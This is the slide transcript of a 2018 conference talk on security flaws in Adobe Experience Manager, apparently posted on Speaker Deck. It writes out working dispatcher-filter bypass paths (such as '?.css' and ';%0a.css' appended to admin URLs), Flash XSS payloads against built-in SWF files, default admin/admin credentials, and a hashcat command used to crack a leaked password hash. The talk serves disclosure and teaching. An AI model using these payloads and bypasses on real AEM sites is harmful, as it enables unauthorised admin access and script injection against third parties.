Upgrade to Pro — share decks privately, control downloads, hide ads and more …

A story of the passive aggressive sysadmin of AEM

Frans Rosén
September 13, 2018
Technology
0
7.4k

A story of the passive aggressive sysadmin of AEM

# By Frans Rosén

Adobe Experience Manager is an enterprise CMS with a troubled history. It was created with the angle of high customization factor, enabling consulting firms to deploy it all over the world for huge customers.

Then came security.

Frans will go through some terrible default configuration mistakes, Adobe’s love for bad Flash and how a sysadmin accidentialy exposed an international multi billion dollar company using only sad thoughts.

# About speaker

Frans Rosén is a tech entrepreneur, bug bounty hunter and a Security Advisor at Detectify, a security service for developers. He’s a frequent blogger at Detectify Labs and a top ranked participant of bug bounty programs, receiving some of the highest bounty payouts ever on HackerOne.

Frans was recently featured as #2 on Hackread’s list of 10 Famous Bug Bounty Hunters of All Time and the results of his security research has been covered in numerous international publications such as Observer, BBC, Ars Technica, Wired and Mashable.

Frans Rosén

September 13, 2018
Tweet

More Decks by Frans Rosén

See All by Frans Rosén
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
fransrosen
3
8.2k
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
fransrosen
3
6.1k

Other Decks in Technology

See All in Technology
Signals Unleashed: The Full Guide
rainerhahnekamp
0
350
SIEMを用いて、セキュリティログ分析の可視化と分析を実現し、PDCAサイクルを回してみた
coconala_engineer
0
140
長期間TiDBを使ってきた話 @ 私たちはなぜNewSQLを使うのかTiDB選定5社が語る選定理由と活用LT / Experiences with TiDB Over Time
chibiegg
2
150
Databricksを活用してDELISH KITCHENのレシピレコメンドを開発した話
furu8
0
240
入社後初めてのタスクでk8sアップグレードした話.pdf
kkato1
0
370
o11y入門_外形監視を利用したWebアプリケーションへの最適なモニタリング_TechBrew
k5k
2
100
巨大なテーブルのテーブル定義を無停止で安全に誰でも変更できるようにする / Table-definitions-for-huge-tables-can-be-modified-by-anyone-safely-and-non-disruptively
freee
1
710
次世代Web認証「パスキー」 / mo-zatsudan-passkey
nkzn
22
13k
Tebiki株式会社 エンジニア採用資料
tebiki
0
4k
シン・Kafka / shin-kafka
oracle4engineer
PRO
6
2.7k
The AI Revolution Will Not Be Monopolized: How open-source beats economies of scale, even for LLMs
inesmontani
PRO
1
630
20240416_devopsdaystokyo
kzkmaeda
1
170

Featured

See All Featured
A Philosophy of Restraint
colly
195
16k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
15
1.4k
WebSockets: Embracing the real-time Web
robhawkes
59
7k
Web Components: a chance to create the future
zenorocha
304
41k
Art, The Web, and Tiny UX
lynnandtonic
288
19k
The Cost Of JavaScript in 2023
addyosmani
13
3.8k
Designing for Performance
lara
601
67k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
118
38k
No one is an island. Learnings from fostering a developers community.
thoeni
14
2.1k
The MySQL Ecosystem @ GitHub 2015
samlambert
242
12k
Robots, Beer and Maslow
schacon
PRO
154
7.9k
Bootstrapping a Software Product
garrettdimon
PRO
301
110k

Transcript

  1. @fransrosen A story of the passive aggressive sysadmin of AEM

    or "How to make a talk in 3h 35min"

  2. @fransrosen Frans Rosén Bug bounties! labs.detectify.com twitter.com/fransrosen I blogged about

    Subdomain Takeovers. Donald Trump got hacked. The hacker referred to my post as his inspiration. I broke Let’s Encrypt Live hacking! I won a boxing belt once

  3. @fransrosen Frans Rosén Bug bounties! labs.detectify.com twitter.com/fransrosen I blogged about

    Subdomain Takeovers. Donald Trump got hacked. The hacker referred to my post as his inspiration. I broke Let’s Encrypt Live hacking! I won a boxing belt once namedropped in ytcracker - green hat

  4. @fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  5. @fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html CVE-2016-0957

  6. @fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html CVE-2016-0957 "The world’s lamest

    RCE."

  7. @fransrosen How AEM is structured https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  8. @fransrosen How AEM is structured Adobe "black magic glue"

  9. @fransrosen How AEM is structured Stuff you pay your consultants

    for Adobe "black magic glue"

  10. @fransrosen Shit no one’s updating Stuff you pay your consultants

    for Adobe "black magic glue" How AEM is structured

  11. @fransrosen How AEM is structured https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  12. @fransrosen How AEM is structured Apache HTTP server module

  13. @fransrosen How AEM is structured Reverse proxy+filter Apache HTTP server

    module

  14. @fransrosen How AEM is structured Apache HTTP server module Pages

    + metadata + content Reverse proxy+filter

  15. @fransrosen How AEM is structured Apache HTTP server module Pages

    + metadata + content Reverse proxy+filter A bunch of admin-tools

  16. @fransrosen How AEM is structured You should not have access

    to this Apache HTTP server module Pages + metadata + content Reverse proxy+filter A bunch of admin-tools

  17. @fransrosen How AEM is structured You should not have access

    to this Or this Apache HTTP server module Reverse proxy+filter A bunch of admin-tools Pages + metadata + content

  18. @fransrosen Creating pages

  19. @fransrosen Creating pages Author creates a new page in the

    repo

  20. @fransrosen Creating pages Author creates a new page in the

    repo Goes through the publisher nodes

  21. @fransrosen Creating pages Author creates a new page in the

    repo Goes through the publisher nodes Dispatcher serves the content

  22. @fransrosen Accessing pages

  23. @fransrosen Accessing pages Dispatcher gets the URL

  24. @fransrosen Accessing pages Dispatcher gets the URL Goes through a

    filter (This filter is awesome, it’s impossible to break, don’t even dare to try)

  25. @fransrosen Accessing pages Dispatcher gets the URL If all is

    OK, serve from publish node Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)

  26. @fransrosen CVE-2016-0957 aka "I am two years old but I’m

    inside an enterprise product that no one can or dares to upgrade"

  27. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  28. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  29. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  30. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  31. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  32. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  33. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  34. @fransrosen This is ridiculous

  35. @fransrosen Accessing pages?.css Dispatcher gets the URL?.css

  36. @fransrosen Accessing pages Dispatcher gets the URL?.css Every time is

    OK time

  37. @fransrosen Accessing pages Dispatcher gets the URL?.css Every time is

    OK time Serve from publish node

  38. @fransrosen Publish nodes

  39. @fransrosen Disk usage /etc/reports/diskusage.html?.css Disk Usage lists all repo dirs

    + metadata

  40. @fransrosen My fav, opensocial proxy /libs/opensocial/proxy?url=x&.css

  41. @fransrosen My fav, opensocial proxy /libs/opensocial/proxy?url=x&.css

  42. @fransrosen …but there’s more!

  43. @fransrosen CRX Explorer /crx/de/index.jsp?.css

  44. @fransrosen CRX Explorer /crx/explorer/browser/index.jsp?.css

  45. @fransrosen CRX Explorer Search /crx/explorer/browser/index.jsp?.css

  46. @fransrosen Content Repository Extreme /crx/explorer/index.jsp?.css

  47. @fransrosen Package Manager /crx/packmgr/index.jsp?.css

  48. @fransrosen Namespace Editor (no auth needed!) /crx/explorer/ui/namespace_editor.jsp?.css

  49. @fransrosen bin/querybuilder /bin/querybuilder.json?.css

  50. @fransrosen bin/querybuilder /bin/querybuilder.json?.css

  51. @fransrosen

  52. @fransrosen bin/querybuilder for SWFs!

  53. @fransrosen bin/querybuilder for SWFs!

  54. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

  55. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

  56. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String

  57. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// Thx Neal Poole

  58. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// Thx Neal Poole

  59. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window Thx Neal Poole

  60. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window /etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf? loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain) %7dcatch(e)%7b%7d// Thx Neal Poole

  61. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window /etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf? loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain) %7dcatch(e)%7b%7d// /etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source] (document.domain)-window Thx Neal Poole

  62. @fransrosen Allowing anonymous publish access

  63. @fransrosen Allowing anonymous publish access

  64. @fransrosen Allowing anonymous publish access

  65. @fransrosen but Peter mentioned RCE?

  66. @fransrosen RCE? https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  67. @fransrosen RCE? https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html admin / admin

  68. @fransrosen RCE https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  69. @fransrosen RCE https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  70. @fransrosen Patch for CVE-2016-0957

  71. @fransrosen Patch for CVE-2016-0957 WOHO! WOHO!

  72. @fransrosen Patch for CVE-2016-0957 WOHO! WOHO!

  73. @fransrosen Patch for CVE-2016-0957 THEN WHAT IS THE PROBLEM? WOHO!

    WOHO!

  74. @fransrosen Problem 1

  75. @fransrosen Problem 1

  76. @fransrosen Problem 1 PRIORITY: nah, bro

  77. @fransrosen Problem 2

  78. @fransrosen Problem 2

  79. @fransrosen Patch for CVE-2016-0957 IRL VERSION

  80. @fransrosen Patch for CVE-2016-0957 IRL

  81. @fransrosen Patch for CVE-2016-0957 IRL

  82. @fransrosen Patch for CVE-2016-0957 IRL

  83. @fransrosen Bypasses, seriously ?.js ;%0a.css Thank Jasmin Landry for this

    one

  84. @fransrosen The passive agressive sysadmin

  85. @fransrosen The passive agressive sysadmin + +

  86. @fransrosen The passive agressive sysadmin + +

  87. @fransrosen I’ve seen this before

  88. @fransrosen AEM

  89. @fransrosen CRX

  90. @fransrosen CRXDE

  91. @fransrosen All other stuff

  92. @fransrosen /system/console

  93. @fransrosen /system/console admin / admin

  94. @fransrosen /system/console admin / admin

  95. @fransrosen Report!

  96. @fransrosen Search time!

  97. @fransrosen Search time!

  98. @fransrosen Search time!

  99. @fransrosen Search time!

  100. @fransrosen WTF

  101. @fransrosen WTF $ h=$(echo "6J7An/QgzU+j5gr1G0CyEexJ9xkgiIyyUzTcmaCCV5g=" \ | base64 -D |

    xxd -p | tr -d '\n')

  102. @fransrosen WTF $ h=$(echo "6J7An/QgzU+j5gr1G0CyEexJ9xkgiIyyUzTcmaCCV5g=" \ | base64 -D |

    xxd -p | tr -d '\n') $ echo $h e89ec09ff420cd4fa3e60af51b40b211ec49f71920888cb25334dc99a082 5798

  103. @fransrosen hashcat ftw $ echo $h > hash.txt $ ./hashcat.app

    -a 0 -m 1400 hash.txt rockyou.txt

  104. @fransrosen hashcat ftw $ echo $h > hash.txt $ ./hashcat.app

    -a 0 -m 1400 hash.txt rockyou.txt 
 Status.........: Cracked Started: Thu Sep 13 11:59:23 2018 Stopped: Thu Sep 13 11:59:25 2018

  105. @fransrosen hashcat ftw ih8uall

  106. @fransrosen /system/console

  107. @fransrosen /system/console admin / ih8uall

  108. @fransrosen /system/console

  109. @fransrosen /system/console

  110. @fransrosen Report 2

  111. @fransrosen Report 2

  112. @fransrosen Report 2

  113. @fransrosen Public bug bounty programs with AEM Public responsible disclosure

    Private ones

  114. @fransrosen Thanks!